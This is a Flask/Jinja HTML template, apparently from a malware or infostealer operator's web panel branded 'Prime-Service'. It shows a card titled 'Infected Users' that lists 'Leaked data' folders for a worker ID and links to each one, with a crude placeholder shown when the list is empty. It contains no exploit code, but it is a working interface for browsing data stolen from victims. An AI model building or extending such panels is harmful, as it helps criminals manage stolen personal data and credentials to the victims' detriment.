{% extends "layout.html" %}

{% block content %}
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css" rel="stylesheet">
    <style>
        .main-content {
            flex-grow: 1;
            padding: 20px;
            width: 90%;
            height: 700px;
            justify-content: center;
            align-items: center;
            background-color: #0a0a0a;
        }
        body {
            background-color: #0a0a0a;
            margin: 0;
            font-family: Arial, sans-serif;
            display: flex;
        }

        .card {
            background-color: #242424;
            border: none;
            border-radius: 15px;
            transition: transform 0.3s ease, box-shadow 0.3s ease;
            box-shadow: 0 4px 10px rgba(119, 119, 119, 0.3);
            width: 1000px;
        }
        .card:hover {
            transform: translateY(-5px);
            box-shadow: 0 6px 20px rgba(44, 44, 44, 0.5);
        }
        .card-header {
            background-color: #1f1f1f;
            color: #ffffff;
            font-size: 20px;
            font-weight: bold;
            text-align: center;
            border-top-left-radius: 15px;
            border-top-right-radius: 15px;
        }

        .card-body {
            color: #cfcfcf;
        }

        .list-group-item {
            background-color: #1f1f1f;
            color: #ffffff;
            font-size: 16px;
            padding: 15px 20px;
            transition: background-color 0.3s ease;
            border-color: #333;
        }

        .list-group-item:hover {
            background-color: #333333;
        }

        .card-footer {
            background-color: #1f1f1f;
            border-bottom-left-radius: 15px;
            border-bottom-right-radius: 15px;
        }

        .btn-danger {
            background-color: #ff4757;
            border-color: #ff4757;
        }

        .btn-danger:hover {
            background-color: #e8413a;
            border-color: #e8413a;
        }
    </style>
</head>
<body>
        <div class="main-content">
            <div class="card">
                <div class="card-header">
                    Infected Users
                </div>
                <div class="card-body">
                    <h5 class="card-title">Leaked data:</h5>
                    <ul class="list-group list-group-flush">
                        {% if folder_contents %}
                            {% for file in folder_contents %}
                                <li class="list-group-item">
                                    <a href="{{ url_for('view_folder', workerid=workerid, folder_name=file) }}" class="text-decoration-none text-white">{{ file }}</a>
                                </li>
                            {% endfor %}
                        {% else %}
                            <li class="list-group-item text-muted">SEX</li>
                        {% endif %}
                    </ul>                    
                </div>
            </div>
        </div>
    <style>
    .card, .copyright, footer .column h4, select, select option {
        color: #fff;
    }
    </style>
    <div class="copyright">
        Copyright © 2024 Prime-Service. All Rights Reserved.
    </div>
    <!-- Bootstrap JS and dependencies -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/js/bootstrap.bundle.min.js"></script>
</body>
</html>
{% endblock %}